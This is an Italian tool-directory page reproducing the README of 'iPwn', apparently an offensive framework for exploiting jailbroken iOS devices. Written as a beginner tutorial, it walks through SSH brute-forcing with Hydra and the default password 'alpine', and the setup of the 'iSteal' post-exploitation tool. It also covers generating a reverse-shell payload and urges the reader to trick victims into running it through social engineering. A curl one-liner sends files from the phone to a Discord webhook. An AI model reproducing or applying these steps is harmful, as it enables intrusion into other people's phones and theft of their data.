Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
iPwn — Un Framework progettato per lo sfruttamento di dispositivi iOS. | Kitploit
Strumenti/GitHubGitHub/brows3r/ipwn
Sicurezza iOSAttacchi alle PasswordGenerazione di PayloadExploitPost-ExploitPenetration TestingSicurezza MobileStrumento di Accesso Remoto
GitHubbrows3r/ipwn

iPwn

Un Framework progettato per lo sfruttamento di dispositivi iOS.

Vedi Repository
233365 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

iPwn

Un framework pensato per lo sfruttamento di dispositivi iOS. image

<!> RICORDA: L'IPHONE CHE STAI TENTANDO DI ACCEDERE CON QUESTO STRUMENTO DEVE ESSERE JAILBROKEN <!>

Stato - ❌

Questo progetto è ancora in fase di sviluppo. Sto aggiungendo ulteriori estensioni e opzioni per il post-exploitation per raccogliere informazioni sul dispositivo e altre cose. Sto anche lavorando a un modo per inserire un payload in un normale tweak iOS in modo che ottenere una reverse shell sia più semplice.

Log degli aggiornamenti

[6/2/21] - Aggiunto un menu extra per le persone che hanno i propri dispositivi collegati al computer e vogliono armeggiarci. Presto verranno aggiunte altre cose.

[6/2/21] - Aggiunti 4 moduli extra per lo strumento di post-exploitation 'iSteal'. Aggiunta anche un'opzione per installare il jailbreak checkra1n.

[5/25/21] - Aggiunti 8 moduli extra per lo strumento di post-exploitation 'iSteal'.

[5/25/21] - Aggiunti 2 moduli extra per lo strumento di post-exploitation 'iSteal'.

Descrizione/Come usare [PER PRINCIPIANTI!!!]

iPwn è un framework pensato per sfruttare e ottenere l'accesso a dispositivi iOS. Ha anche un'estensione che è un mini-framework chiamato 'iSteal' destinato al post-exploitation (dopo aver ottenuto l'accesso al dispositivo). Questa descrizione ti guiderà attraverso i diversi modi e passaggi per ottenere l'accesso a un dispositivo iOS e raccogliere informazioni da esso.

Il primo modo per ottenere l'accesso a un dispositivo iOS. - SSH-Bruteforcing.

La maggior parte dei dispositivi iOS jailbroken con Cydia vengono forniti con OpenSSH preinstallato. E di solito, le credenziali sono molto deboli o comuni, una delle password più comuni sarà inclusa in una wordlist che dovrebbe essere nella tua cartella se hai scaricato iPwn dal mio Github.

Quindi iniziamo! Per prima cosa, eseguiamo lo script.

root@kitploit:~
python main.py

Poi, scriveremo il comando 'brute'. (Se vuoi digitare help e familiarizzare con i comandi, puoi farlo.) image

Una volta digitato il comando 'brute'. Digita 'help' per visualizzare tutti i comandi disponibili. image Ora, useremo il comando 'default' per avviare SSH-Bruteforcing con una wordlist contenente le password più comuni. Ti verrà chiesto di inserire l'indirizzo IP del target, assicurati di inserire quello corretto e valido, premi invio, poi passa al passaggio successivo. image

<!> SE STAI OTTENENDO ERRORI, ASSICURATI CHE HYDRA SIA INSTALLATO, PUOI INSTALLARE HYDRA CON I COMANDI SOTTO <!>

root@kitploit:~
commands to install hydra:

sudo apt install hydra
sudo pacman -S hydra

Tornando al tutorial, se hai hydra installato sul tuo PC, dovrebbe già tentare di fare bruteforce. Aspetta circa 20-40 secondi e se il dispositivo utilizza le credenziali predefinite/comuni fornite nella wordlist, Hydra dovrebbe darti un messaggio che mostra la password corretta. image

Come possiamo vedere, la password corretta è 'alpine'. Ora possiamo accedere al telefono eseguendo 'ssh root@ip_goes_here' su un'altra finestra di terminale. Quando ti chiede la password, inserisci la password che hai ottenuto da Hydra. image

Ora siamo loggati!

image

A questo punto probabilmente vogliamo raccogliere alcune informazioni sul telefono e controllarlo, ma questo verrà dopo. Perché prima, dobbiamo installare alcune cose molto importanti. Se vuoi usare SCP per trasferire il file di setup che automatizza tutto, puoi farlo. Il file si trova in /post-exploitation/post.sh. Una volta trasferito il file 'post.sh' sul dispositivo iOS, eseguilo con 'bash post.sh' e dovrebbe iniziare a installare e configurare gli strumenti di post-exploitation che useremo.

<!> NOTA: I COMANDI SOTTO SONO SOLO PER LE PERSONE CHE VOGLIONO INSTALLARE I PACCHETTI E GLI STRUMENTI NECESSARI MANUALMENTE <!>

root@kitploit:~
run all these commands to setup/install everything thats needed:

apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git

Ok, ora che abbiamo tutto installato, possiamo andare nella cartella 'iSteal' ed eseguire lo script di post-exploitation 'iSteal'.

root@kitploit:~
python3 post.py

<!> NOTA: Assicurati quando provi a eseguire file python, di usarli con "python3" invece di "python" o "py" <!>

Quindi ora lo script dovrebbe essere caricato, se vuoi usare il comando 'help' e dare un'occhiata, puoi farlo. image

Ora, useremo il comando 'list' per mostrare i moduli/opzioni disponibili per il post-exploitation. image

<!> Tieni PRESENTE: CI SARANNO MOLTI AGGIORNAMENTI SULLO SCRIPT DI POST-EXPLOITATION, E VERRANNO AGGIUNTI ALTRI MODULI, QUINDI QUESTA IMMAGINE VERRÀ AGGIORNATA PER MANTENERE L'ACCURATEZZA <!>

Per usare un modulo, basta fare 'use specific/module'. Esempio: use modules/list_installed_default_apps

E come puoi vedere, quando eseguiamo quel modulo, mostra le applicazioni predefinite installate sul dispositivo iOS del target. image

Il secondo modo per ottenere l'accesso a un dispositivo iOS. - Reverse shell.

Ora, ti mostrerò come farlo nel secondo modo, che è un po' più avanzato. Tieni presente, non includerò immagini per questa parte.

root@kitploit:~
run the iPwn framework by doing 'python main.py'
type in the 'payload' command
wait for the payload factory to load.
select a payload of your choice, Example: use payloads/factory/reverse_bash
enter your IP
enter your Port
then you should get a message that says 'payload generated'
type in the 'back' command to go back to the main menu
type in the 'listen' command to start listening for incoming connections
make sure that your victim runs the script via terminal or throught their own way, try social engineering, be creative!
once the script is executed on the victims iOS device, you should get a connection
install the important packages via transferring the 'post.sh' located in /post-exploitation and executing it, or manually do it yourself.
you can now run the 'iSteal' or 'AutoEnum' post-exploitation tools
have fun! :)

<!> Se stai eseguendo il passo 2 e ti blocchi sulla parte in cui devi installare i pacchetti/strumenti importanti, vai al passo 1 e copia la guida per l'installazione dei pacchetti/strumenti! <!>

Trasferimento/Estrazione file

Ci sono molti modi per trasferire file al dispositivo iOS e anche molti modi per scaricarli. Il modo più semplice per estrarre e scaricare file dal dispositivo iOS è usare Curl e un webhook di Discord.

<!> NOTA: Il segmento sotto dimostrerà come estrarre e scaricare file dal dispositivo iOS usando curl <!>

root@kitploit:~
Step 1: Create a discord server
Step 2: Create a webhook and copy the link
Step 3: On the iOS device, navigate towards the directory that contains the file you want to retrieve.
Step 4: enter the command below (replace file_here.txt with the name of your file, replace webhook_url_here with your webhook url)

curl -i -H 'Expect: application/json' -F file=@file_here.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' webhook_url_here

Step 5: wait around 10-50 seconds
Done! The file should now be uploaded to your discord server. You can now download/view the file.

Sistemi operativi testati

root@kitploit:~
Windows 10 - Stabile
Garuda Linux - Stabile
Arch based distros - Stabile

Dispositivi iOS supportati e testati

root@kitploit:~
Dispositivi supportati [L'estensione di post-exploitation dovrebbe funzionare per tutti questi]
-----------------
iPod più recenti del 4a generazione
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12

I miei dispositivi testati [Quelli che ho testato personalmente]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod 4a generazione

Screenshot

image image image image

Crediti

[https://github.com/0x1CA3]

Scarica lo strumento